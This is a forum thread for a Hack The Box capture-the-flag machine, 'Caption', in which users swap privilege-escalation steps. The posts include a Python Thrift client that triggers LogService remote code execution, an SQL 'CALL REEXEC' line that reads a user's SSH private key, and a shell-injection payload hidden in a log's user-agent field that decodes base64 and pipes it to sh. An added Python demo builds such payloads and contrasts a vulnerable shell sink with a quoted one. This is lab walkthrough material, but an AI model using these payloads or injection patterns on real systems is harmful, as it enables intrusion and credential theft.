HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
#31
The way to root is using the Thrift client and leveraging the LogService RCE.
Steps:
- clone the repo into margo's home and generate the Python files (easiest way): https://thrift.apache.org/tutorial/py.html
thrift --gen py log_service.thrift
- scp the generated files to your attacker machine and install the Python library thrift (on your machine, in a virtual environment)
- create a file on the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- local-forward port 9090 to your machine
- create a client in Python and execute it

```python
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
# Generated by `thrift --gen py log_service.thrift`; run this from the gen-py
# directory or add that directory to sys.path.
from log_service import LogService


def main():
    # 9090 is the LogService port, locally forwarded to the attacker machine
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        # Path of the crafted log file as it exists on the box (the service reads it)
        response = client.ReadLogFile("/path/to/file/created")
        print(response)
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()


if __name__ == "__main__":
    main()
```
#32
(Sep 14, 2024, 10:37 PM)hackemall Wrote: for the slow guy can someone help with the command that cats the ssh key

CALL REEXEC('cat .ssh/id_ecdsa');
#33
(Sep 14, 2024, 10:44 PM)FallenAngel Wrote:
(Sep 14, 2024, 10:37 PM)hackemall Wrote: for the slow guy can someone help with the command that cats the ssh key

CALL REEXEC('cat .ssh/id_ecdsa');

I'd start by mentioning the alias REEXEC creation as shown on Medium

#34
(Sep 14, 2024, 11:04 PM)hollb_geek Wrote:
(Sep 14, 2024, 10:44 PM)FallenAngel Wrote:
I'd start by mentioning the alias REEXEC creation as shown on Medium

Well, no offence, but he didn't ask for that. I should've just said cat .ssh/id_ecdsa, since he obviously knew he could enumerate the file system using the RCE mentioned in the Medium post, which was mentioned before ;)
#35
(Sep 14, 2024, 10:39 PM)spamdegratis5 Wrote: The way to root is using thrift client and leverage the LogService rce

For the root part, the payload content:

```
4.3.2.1 "user-agent":"'; echo PAYLOAD_B64 | base64 -d | sh ; #"
```
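Putting the two posts above together (the {"user-agent", "ip"} log-line shape from #31 and the `'; echo … | base64 -d | sh ; #` payload from #35): the Python below is an added example, not code from the thread or from the box. It builds such a log entry from an arbitrary command and then runs the resulting user-agent through a hypothetical sink that pastes the field into a single-quoted shell string, next to the same sink hardened with shlex.quote. The sink is an assumed model of the behaviour the payload implies (a closing quote followed by commands and a `#` comment), not the box's LogService code; the command and the log line are constructed samples; the Thrift call itself is not reproduced, and the `4.3.2.1 "user-agent":…` variant from #35 is not parsed here.

```python
import base64
import json
import os
import shlex
import subprocess
import tempfile


def build_log_entry(command, ip="1.1.1.1"):
    """Return one log line in the {"user-agent": ..., "ip": ...} shape from the post.

    The command is base64-wrapped, as in the payload shown later in the thread,
    so quotes or pipes in the real command never touch the JSON line or the
    single-quoted shell string; only the fixed decoder stub is injected.
    """
    b64 = base64.b64encode(command.encode()).decode()
    user_agent = "'; echo " + b64 + " | base64 -d | sh ; #"
    return json.dumps({"user-agent": user_agent, "ip": ip})


def parse_user_agent(log_line):
    """What a log reader would pull out of the line before using the field."""
    return json.loads(log_line)["user-agent"]


def vulnerable_sink(user_agent):
    """Hypothetical sink (assumed, not the box's LogService code): the field is
    pasted into a single-quoted shell string, so a leading quote closes the
    literal and everything after it is parsed by sh as further commands."""
    cmd = "printf '%s' '" + user_agent + "' | wc -c"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def hardened_sink(user_agent):
    """Same operation with the untrusted field passed through shlex.quote, so
    the embedded quote is escaped and the whole field stays one argument."""
    cmd = "printf '%s' " + shlex.quote(user_agent) + " | wc -c"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def demo():
    """Feed the same crafted log line to both sinks and report whether the
    injected command (a marker-file drop in a temp dir) actually ran.

    Returns (ran_in_vulnerable_sink, ran_in_hardened_sink)."""
    outcome = []
    for sink in (vulnerable_sink, hardened_sink):
        with tempfile.TemporaryDirectory() as workdir:
            marker = os.path.join(workdir, "pwned")
            # constructed sample payload: it only drops a file we can check for
            line = build_log_entry("touch " + shlex.quote(marker))
            sink(parse_user_agent(line))
            outcome.append(os.path.exists(marker))
    return tuple(outcome)


if __name__ == "__main__":
    print(build_log_entry("id"))
    print(demo())
```

The point of the base64 wrapper is visible in build_log_entry: the real command may contain quotes, pipes or braces without breaking either the JSON line or the single-quoted shell context, because only the fixed decoder stub has to survive both parsers. In hardened_sink the quote inside the field is escaped by shlex.quote, so printf receives the whole user-agent as data and the marker file is never created.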
#36
(Sep 14, 2024, 11:36 PM)FallenAngel Wrote:
(Sep 14, 2024, 11:04 PM)hollb_geek Wrote:
Well, no offence, but he didn't ask for that. I should've just said cat .ssh/id_ecdsa, since he obviously knew he could enumerate the file system using the RCE mentioned in the Medium post, which was mentioned before ;)

thank you, I got it

#37
I did not get the medium thing working but I got this to work if it helps anyone

https://spaceraccoon.dev/remote-code-exe...-database/
#38
(Sep 14, 2024, 06:31 PM)mhsoraa Wrote: https://www.hackthebox.com/machines/caption
https://app.hackthebox.com/machines/625

Have fun and good luck everyone!

https://pbs.twimg.com/media/GXR-8C8WcAIbnPF?format=jpg

owww yeahhh babyyy TY 
#39
(Sep 14, 2024, 10:39 PM)spamdegratis5 Wrote: The way to root is using thrift client and leverage the LogService rce

I couldn't understand the first step, could you explain better?
#40
(Sep 15, 2024, 01:28 AM)0xwww Wrote:
I couldn't understand the first step, could you explain better?

Probably there's another path to root; I also did not really understand the thrift procedure, tried to replicate it but didn't manage to get it working. There's also a user ruth on the machine who has to be there for something and was probably meant for escalating privileges another way. There are credentials for the web service on port 80 in app.py for margo and admin, but they don't seem helpful at all; I tried to reuse the admin creds on ruth but sadly it didn't work. I also tried to exploit the copyparty service but it doesn't seem to be possible; I guess we'll have to keep trying.